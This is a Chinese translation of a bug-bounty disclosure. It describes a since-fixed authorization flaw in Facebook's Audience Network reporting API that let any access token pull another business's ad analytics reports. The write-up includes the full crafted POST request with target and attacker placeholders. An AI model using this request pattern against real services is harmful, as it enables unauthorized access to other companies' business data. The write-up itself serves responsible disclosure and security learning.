[翻译]未经授权访问企业用户的Facebook广告分析报告(Export Facebook audience network reports of any business)
info
这是个人第一次翻译文章,直译内容较为生涩,所以进行了润色.
Description
在使用API生成报告时,服务器并没有进行严格的权限校验(access_token).
根据官方文档https://developers.facebook.com/docs/audience-network/reporting-api
请求定义格式如下:
https://graph.facebook.com///adnetworkanalytics/
POST数据可包含所选中的数据分析参数、指标、筛选条件和失败情况
通过文档可知,我们可以构造APP_ID、BUSINESS_ID、PROPERTY_ID这三个参数
我对app_ip和property_id参数进行构造发现请求失败,接口返回错误.
但是,如果我使用BUSSINESS_ID参数请求时,服务器可正确返回一个带有query_id的响应。
Demonstration
构造POST请求如下:
https://graph.facebook.com/v3.0/{TARGET_BUSINESS}/adnetworkanalytics?access_token={ATTACKER_ACCESS_TOKEN}
aggregation_period=day&breakdowns=["property","app","placement","country","platform","display_format"]&filters=[{"field":"delivery_method","operator":"IN","values":["standard"]}]
&metrics=["fb_ad_network_cpm","fb_ad_network_ctr","fb_ad_network_show_rate","fb_ad_network_filled_request","fb_ad_network_imp","fb_ad_network_click","fb_ad_network_request","fb_ad_network_revenue","fb_ad_network_fill_rate"]
&ordering_column=metric
&since={EPOCH_FORMAT_DATE}
&until={EPOCH_FORMAT_DATE}
服务器会返回query_id和重定向链接,通过重定向后的链接我可以下载生成的报告.
Impact
黑客可任意下载企业用户的广告分析报告
Timeline
Jan 9, 2019— Report Sent
Jan 9, 2019—Clarification requested by Facebook
Jan 9, 2019— Clarification sent
Jan 9, 2019—Clarification requested by Facebook
Jan 9, 2019—Clarification sent
Jan 10, 2019 —Acknowledged by Facebook
Feb 12, 2019— Fixed by Facebook
Feb 12, 2019 — Bounty Awarded by Facebook
Brainstorm(personal summary)
有一个参数没有进行校验,导致了未经授权访问,是不是很简单?
是的,发现漏洞就是要找到别人没有关注或测试到的细节.
遵守法律,细心观察,敢于尝试!